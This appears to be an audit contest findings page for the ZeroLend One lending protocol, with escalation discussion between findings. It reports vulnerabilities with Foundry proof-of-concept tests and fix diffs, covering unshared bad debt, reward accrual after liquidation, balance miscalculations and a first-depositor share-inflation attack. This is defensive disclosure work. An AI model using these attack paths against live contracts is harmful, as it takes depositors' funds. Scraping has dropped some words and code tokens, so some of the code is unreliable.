diff --git a/zerolend-one/contracts/core/pool/logic/LiquidationLogic.sol b/zerolend-one/contracts/core/pool/logic/LiquidationLogic.sol index e89d626..0a48da6 100644 --- a/zerolend-one/contracts/core/pool/logic/LiquidationLogic.sol +++ b/zerolend-one/contracts/core/pool/logic/LiquidationLogic.sol @@ -225,7 +225,7 @@ library LiquidationLogic { ); // Burn the equivalent amount of aToken, sending the underlying to the liquidator - balances.withdrawCollateral(totalSupplies, vars.actualCollateralToLiquidate, collateralReserveCache.nextLiquidityIndex); + balances.withdrawCollateral(totalSupplies, vars.actualCollateralToLiquidate + vars.liquidationProtocolFeeAmount, collateralReserveCache.nextLiquidityIndex); IERC20(params.collateralAsset).safeTransfer(msg.sender, vars.actualCollateralToLiquidate); }
A2-security, Obsidian, iamnmt
Once vault depositors have deposited funds into a pool, a malicious pool creator can upgrade the interestRateStrategy
contract (using PoolConfigurator.setReserveInterestRateStrategyAddress()
to make all calls to it revert.
As a result any function of the protocol that calls updateInterestRates()
will revert because updateInterestRates()
makes the following call:
(vars.nextLiquidityRate, vars.nextBorrowRate) = IReserveInterestRateStrategy(_reserve.interestRateStrategyAddress) .calculateInterestRates( /* PARAMS */ );
The main impact is that now withdrawals will revert because executeWithdraw()
calls updateInterestRates()
which will always revert, so the funds that vault users deposited into this pool are lost forever.
Allowing the pool deployer to specify any interestRateStrategyAddress
No response
No response
contract to make all calls to it revertAll the funds deposited to the pool from the vault will be lost
No response
Use protocol whitelisted interest rate calculation contracts
Invalid, require malicious admin
Essentially we expect all permissioned actors to behave rationally.
Per the contest's README
There are two set of actors. Actors who manage pools and actors who mange vaults. If an action done by one party causes the other party to suffer losses we'd want to consider that.
This statement makes this issue valid.
Per the contest's
There are two set of actors. Actors who manage pools and actors who mange vaults. If an action done by one party causes the other party to suffer losses we'd want to consider that.
This statement makes this issue valid.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
IMO, the issue is invalid due to this statement of the sponsor.
Essentially we expect all permissioned actors to behave rationally.
It is, absolutely, irrational for a deployer to set a malicious interest rate contract since he has nothing to earn out of this behaviour.
The permissioned actors the protocol refers to are the protocol controlled PoolConfigurator
and owner
roles. They can be expected to act rationally.
This issue involves a malicious pool deployer (which can be anyone).
Deploying pools is permission-less, which is why the protocol was interested in such issues as they clearly stated in the README:
There are two set of actors. Actors who manage pools and actors who mange vaults. If an action done by one party causes the other party to suffer losses we'd want to consider that.
I agree with the escalation of this issue to be High severity. For more information on what I think about the rule, you can see this comment:\#issuecomment-2413297520
Planning to accept the escalation and make this issue High severity.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
@cvetanovv Can we reconsider this issue per this comment :\#issuecomment-2427578837\_
The report wrongly states that the funds are locked forever. ZeroLend has permission to make changes on the pools. Users can get back their funds after adjustment by ZeroLend
The referenced comment is not accurate.
Even if the protocol sets a new IRM through this only configurator function, the pool admin can instantly change it back to the malicious IRM using this only pool admin function.
I agree with @0xSpearmint comment. Even if ZeroLend makes any changes, the malicious pool admin can immediately roll back the previous configuration.
Is there a problem in this one, it says escalation resolved with has duplicates but the label is not added.
@DemoreXTess That's not a problem. The labels of duplicate issues will be added after all escalations are resolved.
@cvetanovv and @WangSecurity ,
Sorry, this might be coming late, but I don't believe that this issue meets the criteria of becoming a High because;
The whole reason for validating this is that the pool deployer can hurt the vault manager, but the vault manager should be rational enough to check the rate strategy contract, before trusting a pool.
@cvetanovv and @WangSecurity ,
Sorry, this might be coming late, but I don't believe that this issue meets the criteria of becoming a High because;
- It relies on the pool deployer becoming Malicious, what are the chances?
- It also relies on the vault managers not doing their due diligence on checking if the pool's strategy is indeed safe.
- Vault Managers are risk managers and should do their thorough checks on every pool, including oracles and strategy contracts before adding such.
The whole reason for validating this is that the pool deployer can hurt the vault manager, but the vault manager should be rational enough to check the rate strategy contract, before trusting a pool.
I agree you are totally right here.
I think that my earlier complaint only affects
Because oracles can not be changed after deployment
A2-security, Nihavent, Obsidian, joshuajee, tallo
When bad debt is accumulated, it should be socialised amongst all suppliers.
The issue is that the protocol does not do this, instead only the last users to withdraw funds will feel the effects of the bad debt.
If a pool experiences bad debt, the first users to withdraw will experience 0 loss, while the last to withdraw will experience a severe loss.
The withdrawn assets is calculated as shares * liquidityIndex
which does not take into account bad debt
This means that even if bad debt accrues, the first users to withdraw will be able to withdraw their shares to assets at a good rate, leaving the last users with all the loss.
No response
No response
This attack path is shown in the PoC:
Huge fund loss for the suppliers last to withdraw
Early withdrawers effectively steal from the late withdrawers
Add the following test to PoolLiquidationTests.t.sol
function test__BadDebtLiquidationIsNotSocialised() external { // Setup users address supplierOfTokenB = address(124343434); address liquidator = address(8888); _mintAndApprove(alice, tokenA, 1000 ether, address(pool)); _mintAndApprove(bob, tokenB, 50 ether, address(pool)); _mintAndApprove(supplierOfTokenB, tokenB, 50 ether, address(pool)); _mintAndApprove(liquidator, tokenB, 100 ether, address(pool)); console.log("bob balance before: %e", tokenB.balanceOf(bob)); // alice supplies 134 ether of tokenA vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, 268 ether, 0); vm.stopPrank(); // bob supplies 50 ether of tokenB vm.startPrank(bob); pool.supplySimple(address(tokenB), bob, 50 ether, 0); vm.stopPrank(); // supplierOfTokenB supplies 50 ether of tokenB vm.startPrank(supplierOfTokenB); pool.supplySimple(address(tokenB), supplierOfTokenB, 50 ether, 0); vm.stopPrank(); // alice borrows 100 ether of tokenB vm.startPrank(alice); pool.borrowSimple(address(tokenB), alice, 100 ether, 0); vm.stopPrank(); // Drops the collateral price to make the position liquidatable // the drop is large enough to make the position in bad debt oracleA.updateAnswer(5e7); // liquidator liqudiates the position // note that he takes all of alice's collateral vm.startPrank(liquidator); pool.liquidateSimple(address(tokenA), address(tokenB), pos, 64 ether); // bob sees that the position is in bad debt and quickly withdraws all that he supplied // bob does not experience any loss from the bad debt vm.startPrank(bob); pool.withdrawSimple(address(tokenB), bob, 50 ether, 0); // supplierOfTokenB tries to withdraw his funds but it reverts, since there is none left vm.startPrank(supplierOfTokenB); vm.expectRevert(); pool.withdrawSimple(address(tokenB), supplierOfTokenB, 50 ether, 0); // the maximum amount supplierOfTokenB can withdraw is 13 ether of tokenB // since that is all that is left in the pool pool.withdrawSimple(address(tokenB), supplierOfTokenB, 13 ether, 0); // log the final state console.log("The following is the final state"); // show that there is no more tokenB left in the pool after bob withdrew everything uint256 PoolBalanceOfB = tokenB.balanceOf(address(pool)); console.log("Remaining balance of tokenB in the pool = %e", PoolBalanceOfB); // show that bob got back the 50 ether he deposited uint256 BobBalanceOfB = tokenB.balanceOf(bob); console.log("bob's balance of tokenB = %e", BobBalanceOfB); // show that supplierOfTokenB only got back 13 ether of tokenB uint256 SupplierBalanceOfB = tokenB.balanceOf(supplierOfTokenB); console.log("SupplierBalanceOfB balance of tokenB = %e", SupplierBalanceOfB); uint256 aliceCollateral = pool.getBalance(address(tokenA), alice, 0); console.log("aliceCollateral =%e ", aliceCollateral); }
Console output:
Ran 1 test for test/forge/core/pool/PoolLiquidationTests.t.sol:PoolLiquidationTest [PASS] test__BadDebtLiquidationIsNotSocialised() (gas: 1089597) Logs: The following is the final state Remaining balance of tokenB in the pool = 8.09523809523809524e17 bob's balance of tokenB = 5e19 SupplierBalanceOfB balance of tokenB = 1.3e19 aliceCollateral =0e0 Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.34ms (1.66ms CPU time) Ran 1 test suite in 11.14ms (4.34ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
Socialise the loss among all depositors
0xNirix, A2-security, JCN, Obsidian, TessKimy, ZC002, iamnmt, tallo
The NFTRewardsDistributor contract which is responsible for managing a users rewards using a masterchef algorithm does not get updated with a users underlying position in a pool is liquidated. This results in the position wrongfully continuing to accrue rewards with an outdated asset balance.
The choice to neglect updating the NFTPositionManager contract when a position is liquidated is the root cause of this issue due to the NFTPositionManager contract not containing up-to-date user balances for calculating rewards.
function earned(uint256 tokenId, bytes32 _assetHash) public view returns (uint256) { return _balances[tokenId][_assetHash].mul(rewardPerToken(_assetHash).sub(userRewardPerTokenPaid[tokenId][_assetHash])).div(1e18).add( rewards[tokenId][_assetHash] ); }
The above calculations are done in NFTRewardsDistributor.sol:98
to determine an NFT positions rewards. Due to this bug, the users balance _balances[tokenId][_assetHash]
will be incorrect, leading to overinflated rewards.
The liquidated user will essentially be able to steal rewards from the protocol/other users since their position won't be backed by any collateral.
function test_UserAccruesRewardsWhileLiquidatedBug() public { NFTPositionManager _nftPositionManager = new NFTPositionManager(); TransparentUpgradeableProxy proxy = new TransparentUpgradeableProxy(address(_nftPositionManager), admin, bytes('')); nftPositionManager = NFTPositionManager(payable(address(proxy))); nftPositionManager.initialize(address(poolFactory), address(0x123123), owner, address(tokenA), address(wethToken)); uint256 mintAmount = 100 ether; uint256 supplyAmount = 1 ether; uint256 tokenId = 1; bytes32 REWARDS_ALLOCATOR_ROLE = keccak256('REWARDS_ALLOCATOR_ROLE'); //approvals _mintAndApprove(owner, tokenA, 30e18, address(nftPositionManager)); _mintAndApprove(alice, tokenA, 1000 ether, address(pool)); // alice 1000 tokenA _mintAndApprove(bob, tokenB, 2000 ether, address(pool)); // bob 2000 tokenB _mintAndApprove(bob, tokenA, 2000 ether, address(pool)); // bob 2000 tokenB //grant the pool some rewards vm.startPrank(owner); nftPositionManager.grantRole(REWARDS_ALLOCATOR_ROLE, owner); nftPositionManager.notifyRewardAmount(10e18, address(pool), address(tokenA), false); vm.stopPrank(); DataTypes.ExtraData memory data = DataTypes.ExtraData(bytes(''), bytes('')); INFTPositionManager.AssetOperationParams memory params = INFTPositionManager.AssetOperationParams(address(tokenA), alice, 550 ether, tokenId, data); INFTPositionManager.AssetOperationParams memory params2 = INFTPositionManager.AssetOperationParams(address(tokenB), bob, 750 ether, 2, data); INFTPositionManager.AssetOperationParams memory params3 = INFTPositionManager.AssetOperationParams(address(tokenA), bob, 550 ether, 2, data); INFTPositionManager.AssetOperationParams memory borrowParams = INFTPositionManager.AssetOperationParams(address(tokenB), alice, 100 ether, tokenId, data); vm.startPrank(alice); tokenA.approve(address(nftPositionManager), 100000 ether); tokenA.approve(address(pool), 100000 ether);;; console.log("Alice deposits %e of token A", params.amount); vm.stopPrank(); vm.startPrank(bob); tokenB.approve(address(nftPositionManager), 100000 ether); tokenA.approve(address(nftPositionManager), 100000 ether); tokenB.approve(address(pool), 100000 ether);;;; console.log("Bob deposits %e of token A", params3.amount); vm.stopPrank(); vm.prank(alice); nftPositionManager.borrow(borrowParams); bytes32 assetHashA = nftPositionManager.assetHash(address(pool), address(tokenA), false); bytes32 pos = keccak256(abi.encodePacked(nftPositionManager, 'index', uint256(1))); console.log("\nAlice rewards earned before liquidation: %e", nftPositionManager.earned(1, assetHashA)); console.log("Bob rewards earned before Alice is Liquidated: %e\n", nftPositionManager.earned(2, assetHashA)); oracleA.updateAnswer(3e5); vm.prank(bob); console.log("Bob liquidates Alice"); pool.liquidateSimple(address(tokenA), address(tokenB), pos, 550 ether); console.log("Skip ahead until end of rewards cycle..."); vm.warp(block.timestamp+14 days); console.log("\nAlice rewards earned after liquidation: %e", nftPositionManager.earned(1, assetHashA)); console.log("Bob rewards earned after Alice is liquidated: %e", nftPositionManager.earned(2, assetHashA)); console.log("Alice rewards equal to Bob rewards: ", nftPositionManager.earned(1, assetHashA) == nftPositionManager.earned(2, assetHashA)); }
Alice deposits 5.5e20 of token A
Bob deposits 5.5e20 of token A
Alice rewards earned before liquidation: 0e0
Bob rewards earned before Alice is Liquidated: 0e0
Bob liquidates Alice
Skip ahead until end of rewards cycle...
Alice rewards earned after liquidation: 4.99999999999953585e18
Bob rewards earned after Alice is liquidated: 4.99999999999953585e18
Alice rewards equal to Bob rewards: true
The PoC shows that even though Alice was liquidated, she continued to accrue the same amount of rewards as Bob over the time period.
When necessary, the liquidation function should callback to the NFT position contract to update the liquidated users position with the contract so they don't continue to accrue rewards.
will incorrectly reduce the supplyShares
, therefore prevent the last users from withdrawingSource:
000000, 0xAlix2, 0xc0ffEE, A2-security, Honour, KupiaSec, Nihavent, Obsidian, Tendency, Valy001, Varun_05, coffiasd, ether_sky, iamnmt, imsrybr0, lemonmon, silver_eth, stuart_the_minion, trachev
The incorrect reduction in PoolLogic::executeMintToTreasury
will cause failure of some (likely to be the last) user's withdrawal, and the fund will be locked.
The totalSupply.supplyShares
is supposed to be the sum of balances.supplyShares
, as they are always updated in tandem:
If this is not held, then some users will not be able to withdraw their collateral, as the totalSupply.supplyShares
will underflow and revert.
However in the PoolLogic::executeMintToTreasury
updates the totalSupply.supplyShares
without updating any user's balance. It is because it incorrectly assumes that there is share to be burned, even though the accrued amount was never really minted to the treasury (in that the treasury's share balance was not added). If it is so, that share should be burned from the treasury.
Also, for example, when premium is added via flashloan, the premium is counted as underlyingBalance:
Therefore, when the underlying asset is transferred out via executeMintToTreasury
, the underlyingBalance
should be updated accordingly.
Non-zero accruedToTreasuryShares
No response
or withdrawSimple
, it will reduce the asset
's totalSupply.supplyShares
incorrectly.The last user(s) who is trying to withdraw will fail, and their fund will be locked
No response
Suggestion of mitigation:
// PoolLogic.sol function executeMintToTreasury( DataTypes.ReserveSupplies storage totalSupply, mapping(address => DataTypes.ReserveData) storage reservesData, address treasury, address asset ) external { DataTypes.ReserveData storage reserve = reservesData[asset]; uint256 accruedToTreasuryShares = reserve.accruedToTreasuryShares; if (accruedToTreasuryShares != 0) { reserve.accruedToTreasuryShares = 0; uint256 normalizedIncome = reserve.getNormalizedIncome(); uint256 amountToMint = accruedToTreasuryShares.rayMul(normalizedIncome); IERC20(asset).safeTransfer(treasury, amountToMint); - totalSupply.supplyShares -= accruedToTreasuryShares; + totalSupply.underlyingBalance -= amountToMint; emit PoolEventsLib.MintedToTreasury(asset, amountToMint); } }
000000, 0xweebad, A2-security, JCN, Obsidian, Tendency, TessKimy, Varun_05, almurhasan, ether_sky, imsrybr0, lemonmon, stuart_the_minion, trachev
Interest rate is updated before updating the debt when repaying debt in BorrowLogic@executeRepay
leading to an incorrect total debt being used when calculating the new interest rates and causing suppliers to keep accruing interest based on the previous debt and even if there are no ongoing borrows anymore.
function executeRepay( DataTypes.ReserveData storage reserve, DataTypes.PositionBalance storage balances, DataTypes.ReserveSupplies storage totalSupplies, DataTypes.UserConfigurationMap storage userConfig, DataTypes.ExecuteRepayParams memory params ) external returns (DataTypes.SharesType memory payback) { DataTypes.ReserveCache memory cache = reserve.cache(totalSupplies); reserve.updateState(params.reserveFactor, cache); payback.assets = balances.getDebtBalance(cache.nextBorrowIndex); // Allows a user to max repay without leaving dust from interest. if (params.amount == type(uint256).max) { params.amount = payback.assets; } ValidationLogic.validateRepay(params.amount, payback.assets); // If paybackAmount is more than what the user wants to payback, the set it to the // user input (ie params.amount) if (params.amount < payback.assets) payback.assets = params.amount; reserve.updateInterestRates( // <==== Audit totalSupplies, cache, params.asset, IPool(params.pool).getReserveFactor(), payback.assets, 0, params.position, ); // update balances and total supplies payback.shares = balances.repayDebt(totalSupplies, payback.assets, cache.nextBorrowIndex); // <==== Audit cache.nextDebtShares = totalSupplies.debtShares; // <==== Audit if (balances.getDebtBalance(cache.nextBorrowIndex) == 0) { userConfig.setBorrowing(, false); } IERC20(params.asset).safeTransferFrom(msg.sender, address(this), payback.assets); emit PoolEventsLib.Repay(params.asset, params.position, msg.sender, payback.assets); }
function updateInterestRates( DataTypes.ReserveData storage _reserve, DataTypes.ReserveSupplies storage totalSupplies, DataTypes.ReserveCache memory _cache, address _reserveAddress, uint256 _reserveFactor, uint256 _liquidityAdded, uint256 _liquidityTaken, bytes32 _position, bytes memory _data ) internal { UpdateInterestRatesLocalVars memory vars; vars.totalDebt = _cache.nextDebtShares.rayMul(_cache.nextBorrowIndex); // <==== Audit (vars.nextLiquidityRate, vars.nextBorrowRate) = IReserveInterestRateStrategy(_reserve.interestRateStrategyAddress) .calculateInterestRates( _position, _data, DataTypes.CalculateInterestRatesParams({ liquidityAdded: _liquidityAdded, // <==== Audit liquidityTaken: _liquidityTaken, totalDebt: vars.totalDebt, // <==== Audit reserveFactor: _reserveFactor, reserve: _reserveAddress }) ); _reserve.liquidityRate = vars.nextLiquidityRate.toUint128(); _reserve.borrowRate = vars.nextBorrowRate.toUint128(); if (_liquidityAdded > 0) totalSupplies.underlyingBalance += _liquidityAdded.toUint128(); else if (_liquidityTaken > 0) totalSupplies.underlyingBalance -= _liquidityTaken.toUint128(); emit PoolEventsLib.ReserveDataUpdated( _reserveAddress, vars.nextLiquidityRate, vars.nextBorrowRate, _cache.nextLiquidityIndex, _cache.nextBorrowIndex ); }
Interest rate is updated before repaying the debt and updating the cached nextDebtShares
which is then used in the interest rate calculation causing it to return a wrong interest rate as it behaves like liquidity was just supplied by the borrower without a change in debt.
causing the utilization goes up and interest rate is updatedtokenB
but the interest rate is not updated correctlyBob keeps accruing interest rate based on the previous debt and even if there are no ongoing borrows and can withdraw it at the expense of other suppliers.
function testRepay() external { _mintAndApprove(alice, tokenA, 3000 ether, address(pool)); _mintAndApprove(alice, tokenB, 1000 ether, address(pool)); _mintAndApprove(bob, tokenB, 5000 ether, address(pool)); vm.startPrank(bob); pool.supplySimple(address(tokenB), bob, 500 ether, 0); skip(12); vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, 1000 ether, 0); skip(12); oracleA.updateRoundTimestamp(); oracleB.updateRoundTimestamp(); pool.borrowSimple(address(tokenB), alice, 375 ether, 0); skip(12); pool.repaySimple(address(tokenB), type(uint256).max, 0); vm.stopPrank(); bytes32 bobPos = keccak256(abi.encodePacked(bob, 'index', uint256(0))); uint256 bobSupplyAssetsBefore = pool.supplyAssets(address(tokenB), bobPos); skip(24 * 30 * 60 * 60); pool.forceUpdateReserve(address(tokenB)); assertGt(pool.supplyAssets(address(tokenB), bobPos), bobSupplyAssetsBefore); // Bob accrued interest even if there are no borrows anymore vm.startPrank(bob); // Reverts because Bob shares with the accrued interest exceed the pool balance but // succeed if there were other suppliers. vm.expectRevert(); pool.withdrawSimple(address(tokenB), bob, type(uint256).max, 0); vm.stopPrank(); }
diff --git a/zerolend-one/contracts/core/pool/logic/BorrowLogic.sol b/zerolend-one/contracts/core/pool/logic/BorrowLogic.sol index 92806b1..c070fb1 100644 --- a/zerolend-one/contracts/core/pool/logic/BorrowLogic.sol +++ b/zerolend-one/contracts/core/pool/logic/BorrowLogic.sol @@ -136,6 +136,14 @@ library BorrowLogic { // user input (ie params.amount) if (params.amount < payback.assets) payback.assets = params.amount; + // update balances and total supplies + payback.shares = balances.repayDebt(totalSupplies, payback.assets, cache.nextBorrowIndex); + cache.nextDebtShares = totalSupplies.debtShares; + + if (balances.getDebtBalance(cache.nextBorrowIndex) == 0) { + userConfig.setBorrowing(, false); + } + reserve.updateInterestRates( totalSupplies, cache, @@ -147,14 +155,6 @@ library BorrowLogic { ); - // update balances and total supplies - payback.shares = balances.repayDebt(totalSupplies, payback.assets, cache.nextBorrowIndex); - cache.nextDebtShares = totalSupplies.debtShares; - - if (balances.getDebtBalance(cache.nextBorrowIndex) == 0) { - userConfig.setBorrowing(, false); - } - IERC20(params.asset).safeTransferFrom(msg.sender, address(this), payback.assets); emit PoolEventsLib.Repay(params.asset, params.position, msg.sender, payback.assets); }
000000, 0xAlix2, A2-security, BiasedMerc, Bigsam, DenTonylifer, Honour, JCN, JuggerNaut63, KupiaSec, Nihavent, Obsidian, Tendency, TessKimy, Varun_05, almurhasan, charlesjhongc, coffiasd, dany.armstrong90, denzi_, dhank, ether_sky, iamnmt, jah, joshuajee, lemonmon, neon2835, oxelmiguel, perseus, silver_eth, trachev
There is an error in the calculation of the supply/debt balance of a position, impacting a wide range of operations across the system, including core lending features.
library have 2 methods to provide supply/debt balance of a position as follows:
function getSupplyBalance(DataTypes.PositionBalance storage self, uint256 index) public view returns (uint256 supply) { uint256 increase = self.supplyShares.rayMul(index) - self.supplyShares.rayMul(self.lastSupplyLiquidtyIndex); > return self.supplyShares + increase; } function getDebtBalance(DataTypes.PositionBalance storage self, uint256 index) internal view returns (uint256 debt) { uint256 increase = self.debtShares.rayMul(index) - self.debtShares.rayMul(self.lastDebtLiquidtyIndex); > return self.debtShares + increase; }
The implementation contains a critical error as it returns the share amount
rather than the asset amount
held. This issue is evident when the function utilizes index
, same as self.lastSupplyLiquidityIndex
or self.lastDebtLiquidityIndex
. Each function returns self.supplyShares
and self.debtShares
, which are share amounts, while the caller expects accurate asset balances. A similar issue occurs when a different index is used, still resulting in an incorrect balance that is significantly lower than the actual balance.
Below I provide a sample scenario to check supply balance (getSupplyBalance
using same liquidity index):
= 2 RAY
(2e27) (Time passed as the liquidity increased).2 RAY
of assets, it got 1 RAY
(2RAY.rayDiv(2RAY)) shares minted.position.getSupplyBalance(2 RAY)
returns 1 RAY
while we expect 2 RAY
which is correct balance.Below is a foundary PoC to validate one live example: failure to fully repay with type(uint256).max due to balance error. Full script can be found here.
function testRepayFailWithUint256MAX() external { _mintAndApprove(alice, tokenA, 4000 ether, address(pool)); // Set the reserve factor to 1000 bp (10%) poolFactory.setReserveFactor(10_000); // Alice supplies and borrows tokenA from the pool vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, 2000 ether, 0); pool.borrowSimple(address(tokenA), alice, 800 ether, 0); vm.warp(block.timestamp + 10 minutes); assertGt(pool.getDebt(address(tokenA), alice, 0), 0); vm.stopPrank(); // borrow again: this will update reserve.lastDebtLiquidtyIndex vm.startPrank(alice); pool.borrowSimple(address(tokenA), alice, 20 ether, 0); vm.stopPrank(); pool.forceUpdateReserve(address(tokenA)); console.log("Debt before repay: ", pool.getDebt(address(tokenA), alice, 0)); vm.startPrank(alice); tokenA.approve(address(pool), UINT256_MAX); pool.repaySimple(address(tokenA), UINT256_MAX, 0); console.log("Debt after repay: ", pool.getDebt(address(tokenA), alice, 0)); console.log("Assert: Debt still exists after full-repay with UINT256_MAX"); assertNotEq(pool.getDebt(address(tokenA), alice, 0), 0); vm.stopPrank(); }
Run the test by
forge test --mt testRepayFailWithUint256MAX -vvv
[PASS] testRepayFailWithUint256MAX() (gas: 567091) Logs: Debt before repay: 819999977330884982376 Debt after repay: 929433690028148 Assert: Debt still exists after full-repay with UINT256_MAX Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.68ms (1.18ms CPU time) Ran 1 test suite in 281.17ms (4.68ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
Since these functions are integral to the core pool/position logic and are utilized extensively across the system, the impacts are substantial.
, withdrawl is processed based on wrong position supply balance which potentially could fail.function executeWithdraw( ... ) external returns (DataTypes.SharesType memory burnt) { DataTypes.ReserveData storage reserve = reservesData[params.asset]; DataTypes.ReserveCache memory cache = reserve.cache(totalSupplies); reserve.updateState(params.reserveFactor, cache); > uint256 balance = balances[params.asset][params.position].getSupplyBalance(cache.nextLiquidityIndex); ...
, it would failpayback.assets
is not the total debt amountsetBorrwing(, false)
because getDebtBalance
almost unlikely goes 0, as it can't do full repayfunction executeRepay( ... ) external returns (DataTypes.SharesType memory payback) { DataTypes.ReserveCache memory cache = reserve.cache(totalSupplies); reserve.updateState(params.reserveFactor, cache); > payback.assets = balances.getDebtBalance(cache.nextBorrowIndex); // Allows a user to max repay without leaving dust from interest. if (params.amount == type(uint256).max) { > params.amount = payback.assets; } ... > if (balances.getDebtBalance(cache.nextBorrowIndex) == 0) { userConfig.setBorrowing(, false); } IERC20(params.asset).safeTransferFrom(msg.sender, address(this), payback.assets); emit PoolEventsLib.Repay(params.asset, params.position, msg.sender, payback.assets); }
and NFTPositionManagerSetter._borrow
, they call NFTRewardsDistributor._handleSupplies
and NFTRewardsDistributor._handleDebt
with wrong balance amounts which would lead to incorrect reward distribution.function _supply(AssetOperationParams memory params) internal nonReentrant { if (params.amount == 0) revert NFTErrorsLib.ZeroValueNotAllowed(); if (params.tokenId == 0) { if (msg.sender != _ownerOf(_nextId - 1)) revert NFTErrorsLib.NotTokenIdOwner(); params.tokenId = _nextId - 1; } IPool pool = IPool(_positions[params.tokenId].pool); IERC20(params.asset).forceApprove(address(pool), params.amount);, address(this), params.amount, params.tokenId,; // update incentives > uint256 balance = pool.getBalance(params.asset, address(this), params.tokenId); _handleSupplies(address(pool), params.asset, params.tokenId, balance); emit NFTEventsLib.Supply(params.asset, params.tokenId, params.amount); } function _borrow(AssetOperationParams memory params) internal nonReentrant { if ( == address(0)) revert NFTErrorsLib.ZeroAddressNotAllowed(); if (params.amount == 0) revert NFTErrorsLib.ZeroValueNotAllowed(); if (params.tokenId == 0) { if (msg.sender != _ownerOf(_nextId - 1)) revert NFTErrorsLib.NotTokenIdOwner(); params.tokenId = _nextId - 1; } // check permissions _isAuthorizedForToken(params.tokenId); IPool pool = IPool(_positions[params.tokenId].pool); pool.borrow(params.asset,, params.amount, params.tokenId,; // update incentives > uint256 balance = pool.getDebt(params.asset, address(this), params.tokenId); _handleDebt(address(pool), params.asset, params.tokenId, balance); emit NFTEventsLib.Borrow(params.asset, params.amount, params.tokenId); }
, wrong balance is used to estimate debt status and refunds.NFTErrorsLib.BalanceMisMatch
because debtBalance
is share amount versus repaid.assets
is asset amountcurrentDebtBalance
will never go 0 because it almost unlikely gets repaid in full, hence refund never happens_handleDebt
would work wrongly due to incorrect balancefunction _repay(AssetOperationParams memory params) internal nonReentrant { ... > uint256 previousDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId); DataTypes.SharesType memory repaid = pool.repay(params.asset, params.amount, params.tokenId,; > uint256 currentDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId); if (previousDebtBalance - currentDebtBalance != repaid.assets) { revert NFTErrorsLib.BalanceMisMatch(); } if (currentDebtBalance == 0 && repaid.assets < params.amount) { asset.safeTransfer(msg.sender, params.amount - repaid.assets); } // update incentives _handleDebt(address(pool), params.asset, params.tokenId, currentDebtBalance); emit NFTEventsLib.Repay(params.asset, params.amount, params.tokenId); }
, it returns wrong asset amount.function totalAssets() public view override returns (uint256 assets) { for (uint256 i; i < withdrawQueue.length; ++i) { > assets += withdrawQueue[i].getBalanceByPosition(asset(), positionId); } }
Manual Review, Foundary
The getSupplyBalance
and getDebtBalance
functions need an update to accurately reflect the balance. Referring to getSupplyBalance
and getDebtBalance
functions from ReserveSuppliesConfiguration
, we can make updates as following:
function getSupplyBalance(DataTypes.PositionBalance storage self, uint256 index) public view returns (uint256 supply) { - uint256 increase = self.supplyShares.rayMul(index) - self.supplyShares.rayMul(self.lastSupplyLiquidtyIndex); - return self.supplyShares + increase; + return self.supplyShares.rayMul(index); } function getDebtBalance(DataTypes.PositionBalance storage self, uint256 index) internal view returns (uint256 debt) { - uint256 increase = self.debtShares.rayMul(index) - self.debtShares.rayMul(self.lastDebtLiquidtyIndex); - return self.debtShares + increase; + return self.debtShares.rayMul(index); }
As I stated in #107 , there are two issues categorized in the same pool. I know it's same problem which is applied to two different variable but the debt and supply are completely different things. Those issues have completely different impacts on the protocol even the problem is similar.
As I stated in #107 , there are two issues categorized in the same pool. I know it's same problem which is applied to two different variable but the debt and supply are completely different things. Those issues have completely different impacts on the protocol even the problem is similar.
You've created a valid escalation!
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You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
2 different issues with 2 different impacts. 2 different root cause but similar.
This should be separated into two issues
Incorrect Supply - 189, 210, 1, 19, 29, 84,127,149, 51, 243, 250, 269, 313, 357, 420, 440, 491, 506.
Incorrect Debt - 190, 208, 2, 30 126, 152, 157, 161, 180, 254 ,270, 314, 421, 459.
Some Watsons submitted this together - 52, 473, 138, 272, 444, 469, 503, 504, 516.
I missed some anyone can help add them also. But my point is in line with @DemoreXTess these are two different issues with different impacts hence they should be classified appropriately. Thank you.
I disagree with the escalation.
The Lead Judge correctly duplicated them under the same logical error rule.
If the following issues appear in multiple places, even in different contracts
- Issues with the same logic mistake.
Moreover, the root cause is the same. It is that the functions return share amount
instead of asset amount
You might also look at some Watson's who have written two issues and see how the difference is only a few words (for example, #151 and #152).
Planning to reject the escalation and leave the issue as is.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
000000, 0xAlix2, 0xAristos, 0xDemon, 0xMax1mus, 0xlrivo, A2-security, Bauchibred, EgisSecurity, HackTrace, Honour, Obsidian, aman, emmac002, iamnmt, perseus, sheep, theweb3mechanic, zarkk01
Chainlink price feeds usually update the price of an asset once it deviates a certain percentage. For example the ETH/USD price feed updates on 0.5% change of price. If there is no change for 1 hour, the price feed updates again - this is called heartbeat:
According to the docs, the protocol should be compatible with any EVM-compatible chain. On the other hand, different chains use different heartbeats for the same assets.
Different chains have different heartbeats:
In PoolGetters::getAssetPrice
, the protocol is using the same heartbeat for all assets/chains, which is 30 minutes.
This causes the protocol to regularly revert unexpectedly (DOS).
The same heartbeat is being used for all chains/assets, in PoolGetters::getAssetPrice
Either constant downtime leading to transactions reverting or insufficient staleness checks leading to the possibility of the old price.
, to withdraw his collateral (in USDT) from a certain pool on Lineawithdraw
function calls other multiple functions leading to GenericLogic::calculateUserAccountData
(which gets the price of an asset)Introduce a new parameter that could be passed alongside the oracle which refers to the heartbeat of that oracle, so that updatedAt
could be compared with that value.
0xMax1mus, A2-security, Bauchibred, BiasedMerc, Jigsaw, Oblivionis, Obsidian, TessKimy, iamnmt
An attacker can frontrun a user's deposit transaction in a new vault pool position, stealing 100% of the depositors underlying token deposit by causing no shares to be minted to the user. This is caused by inflating the value of the shares to cause the user's underlying token deposit amount to round down to be worth 0 shares.
library SharesMathLib { using MathLib for uint256; ...SKIP... uint256 internal constant VIRTUAL_SHARES = 0; ...SKIP... uint256 internal constant VIRTUAL_ASSETS = 0;
